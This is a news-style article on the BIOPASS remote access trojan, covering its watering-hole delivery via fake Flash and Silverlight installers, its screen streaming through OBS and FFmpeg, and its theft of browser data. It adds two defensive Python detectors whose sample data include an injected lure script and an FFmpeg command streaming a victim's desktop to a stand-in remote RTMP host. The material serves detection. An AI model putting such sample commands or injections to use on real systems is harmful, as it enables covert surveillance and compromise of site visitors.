Hackers Spread New BIOPASS Malware to Live-Stream Victims' Screens

Researchers at Trend Micro are warning about a new malware campaign that targets online gambling organizations in China through a watering hole attack. The attackers deliver a new remote access trojan (RAT) called BIOPASS that can watch the victim's computer screen in real time: it abuses well-known, legitimate streaming software, Open Broadcaster Software (OBS) Studio, to capture and stream the desktop of its victims.

Beyond that unusual feature, which comes on top of the functions common to RATs, the Trojan can also steal sensitive data from web browsers and instant messaging applications.

How Has It Been Actively Deployed?

The operators of the Python-based BIOPASS appear to target visitors of Chinese online gambling websites. They inject JavaScript code into those sites that serves the malware disguised as installers for Adobe Flash Player or Microsoft Silverlight.

Adobe ended support for Flash Player at the end of 2020 and has blocked Flash content from running since 12 January 2021, urging users to uninstall the application because of the security risk it poses.

Silverlight is following a similar path, with Microsoft ending support later this year, on 12 October. The framework is only supported on Internet Explorer 11, and there are no plans to extend its life.

Security researchers at Trend Micro found that the script fetching BIOPASS is injected directly into the target site's online support chat page and first checks whether the visitor has already been infected.

Trend Micro states that “If the script confirms that the visitor has not yet been harmed, it will then replace the original page data with the threat actor’s own content. The new page will display an error message with an accompanying instruction telling website visitors to download either a Flash installer or a Silverlight installer, both of which are harmful loaders.”

The attacker is careful to deliver working installers for Flash Player and Silverlight: the legitimate application is either downloaded from the official website or hosted in the threat actor's Alibaba Cloud storage.

The BIOPASS RAT is hosted in the same location, together with the DLLs and libraries needed to run its Python scripts on systems where Python is not installed.
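A site owner who wants to catch this kind of injection needs a way to notice scripts that do not belong on a page such as the support chat page. The Python below is an added defensive check written for this article, not code from Trend Micro or the attackers: it collects the page's script elements, flags external scripts whose origin is not on an allowlist, and flags inline scripts that rewrite the page or mention the Flash and Silverlight lures. The HTML pages, the allowlisted origin and the marker list are constructed for illustration and are not BIOPASS indicators.

```python
"""Audit a page's <script> elements for signs of a watering-hole injection.

Added example for this article, not code from Trend Micro or the attackers.
The HTML pages, the allowlisted origin and the marker list are constructed
for illustration (assumptions, not BIOPASS indicators).
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Origins a site owner expects to serve script on the support chat page (assumed).
ALLOWED_ORIGINS = {"www.example-casino.test"}

# Inline-script fragments worth a closer look: page rewriting and the lures
# described in the article. These markers are an assumption for this example.
SUSPICIOUS_MARKERS = ("flash", "silverlight", "document.write", "innerhtml", "document.cookie")


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from an HTML document."""

    def __init__(self):
        super().__init__()
        self.external = []   # values of <script src=...>
        self.inline = []     # bodies of <script>...</script>
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        # HTMLParser delivers <script> contents as CDATA through handle_data.
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf).strip())


def audit_scripts(html, allowed_origins=ALLOWED_ORIGINS):
    """Return a list of (kind, detail) findings; an empty list means nothing unexpected."""
    collector = ScriptCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for src in collector.external:
        origin = urlparse(src).netloc.lower()
        # A relative src has no netloc and is served by the site itself.
        if origin and origin not in allowed_origins:
            findings.append(("external", src))
    for body in collector.inline:
        lowered = body.lower()
        hits = [m for m in SUSPICIOUS_MARKERS if m in lowered]
        if hits:
            findings.append(("inline", ", ".join(hits)))
    return findings


# Constructed sample: the site's own chat page, then the same page with an
# injected third-party script and a lure that rewrites the page.
CLEAN_PAGE = """<html><body>
<div id="chat"></div>
<script src="https://www.example-casino.test/static/chat.js"></script>
<script>window.chatConfig = {lang: "zh-CN"};</script>
</body></html>"""

INJECTED_PAGE = CLEAN_PAGE.replace("</body>", """<script src="https://cdn-not-ours.test/check.js"></script>
<script>if (!document.cookie.includes("seen")) { document.body.innerHTML = "Error: please install the Flash installer"; }</script>
</body>""")

if __name__ == "__main__":
    for label, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        print(label, audit_scripts(page))
```

Running this against a live page is only meaningful from the server side or a monitoring host that fetches the page the way a visitor would, since the injected script is served by the compromised site itself; the allowlist must be maintained alongside the site's own script deployments or it will produce false positives on every release.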

The researchers note that the Trojan is still under active development and that the loader's default payload was Cobalt Strike shellcode, not the BIOPASS RAT.


How Are Attackers Streaming the Screen Using Open-Source Software?

BIOPASS has all the functionality typically found in remote access malware, such as browsing the file system, exfiltrating files, taking screenshots, remote desktop access, and running shell commands.

It also downloads FFmpeg, which is used to convert, record and stream audio and video, and Open Broadcaster Software (OBS) Studio, an open-source live streaming and video recording tool.

The threat actor can use either tool to capture an infected system's desktop and stream the video to the cloud, then watch the feed in real time by logging into the BIOPASS control panel.
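Legitimate OBS or FFmpeg activity and the abuse described here look alike at the file level, so a hunter has to lean on context: where the binary runs from, what launched it, and where the video goes. The Python below is an added hunting example written for this article, not code from Trend Micro's report or from the malware. It scores process-creation records for exactly those signals. The records and their field names are constructed and simplified; a real Sysmon or EDR schema differs, and the expected install paths and parent-process list are assumptions to tune per environment.

```python
"""Hunt for OBS Studio / FFmpeg launched in a way that fits a RAT, not a streamer.

Added example for this article, not code from Trend Micro or the malware.
The process records and their field names are constructed and simplified;
a real Sysmon or EDR schema differs. Paths and parent lists are assumptions.
"""
import ntpath

# Binaries the article says BIOPASS drops to capture the desktop.
STREAMING_TOOLS = {"obs64.exe", "obs32.exe", "ffmpeg.exe"}

# Where a legitimate OBS install normally lives on Windows (assumed, lowercase prefixes).
EXPECTED_DIRS = ("c:\\program files\\obs-studio\\", "c:\\program files (x86)\\obs-studio\\")

# Parents that point at a script-driven launch rather than a user double-click.
SCRIPT_HOSTS = {"python.exe", "pythonw.exe", "powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe"}


def assess_process(rec):
    """Return the reasons a process-creation record looks like streaming-tool abuse ([] if none)."""
    image = rec["image"].lower()
    name = ntpath.basename(image)
    if name not in STREAMING_TOOLS:
        return []
    reasons = []
    if not image.startswith(EXPECTED_DIRS):
        reasons.append("runs from an unexpected directory")
    if ntpath.basename(rec["parent_image"].lower()) in SCRIPT_HOSTS:
        reasons.append("spawned by a scripting host")
    cmd = rec["command_line"].lower()
    if "rtmp://" in cmd or "rtmps://" in cmd:
        reasons.append("pushes video to a remote RTMP endpoint")
    # --startstreaming and --minimize-to-tray are OBS launch flags; together they
    # give an unattended, hidden stream.
    if "--startstreaming" in cmd and "--minimize-to-tray" in cmd:
        reasons.append("starts streaming unattended and hidden")
    return reasons


def hunt(events):
    """Return (process name, reasons) for every record that triggers at least one reason."""
    results = []
    for rec in events:
        reasons = assess_process(rec)
        if reasons:
            results.append((ntpath.basename(rec["image"].lower()), reasons))
    return results


# Constructed process-creation records: a normal OBS start, a dropped OBS started
# by a Python host, an FFmpeg desktop grab pushed to RTMP, and unrelated noise.
SAMPLE_EVENTS = [
    {"image": r"C:\Program Files\obs-studio\bin\64bit\obs64.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'"C:\Program Files\obs-studio\bin\64bit\obs64.exe"'},
    {"image": r"C:\Users\victim\AppData\Local\Temp\obs\obs64.exe",
     "parent_image": r"C:\Users\victim\AppData\Local\Temp\py\pythonw.exe",
     "command_line": "obs64.exe --startstreaming --minimize-to-tray"},
    {"image": r"C:\ProgramData\ff\ffmpeg.exe",
     "parent_image": r"C:\Users\victim\AppData\Local\Temp\py\pythonw.exe",
     "command_line": "ffmpeg.exe -f gdigrab -i desktop -c:v libx264 -f flv rtmp://198.51.100.7/live/victim"},
    {"image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "notepad.exe"},
]

if __name__ == "__main__":
    for name, reasons in hunt(SAMPLE_EVENTS):
        print(name, "->", "; ".join(reasons))
```

Each reason on its own is weak (streamers do run portable OBS builds, and FFmpeg is often scripted), which is why the function returns the full list rather than a verdict; a rule that fires on two or more reasons, or on the RTMP reason combined with a scripting-host parent, is a reasonable starting threshold.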

While examining the malware, the researchers found a command that enumerates the installation folders of several messaging applications, WeChat, QQ and Aliwangwang among them.

BIOPASS also steals sensitive data, including cookies and saved logins, from several web browsers (Google Chrome, Microsoft Edge Beta, QQ Browser, Sogou Explorer, 360 Safe Browser and 360 Chrome).

Although it was not used in the examined sample, the researchers also found a Python plugin that steals the chat history from the WeChat messenger for Windows.

Another plugin contains several Python scripts for compromising web servers through cross-site scripting (XSS). This would let the threat actor inject their own scripts into the responses served to victims' browsers, giving them control over the JavaScript and HTML resources those pages load.


There is no firm attribution for BIOPASS RAT, but Trend Micro found links to the Chinese Winnti hacking group, also known as APT41.
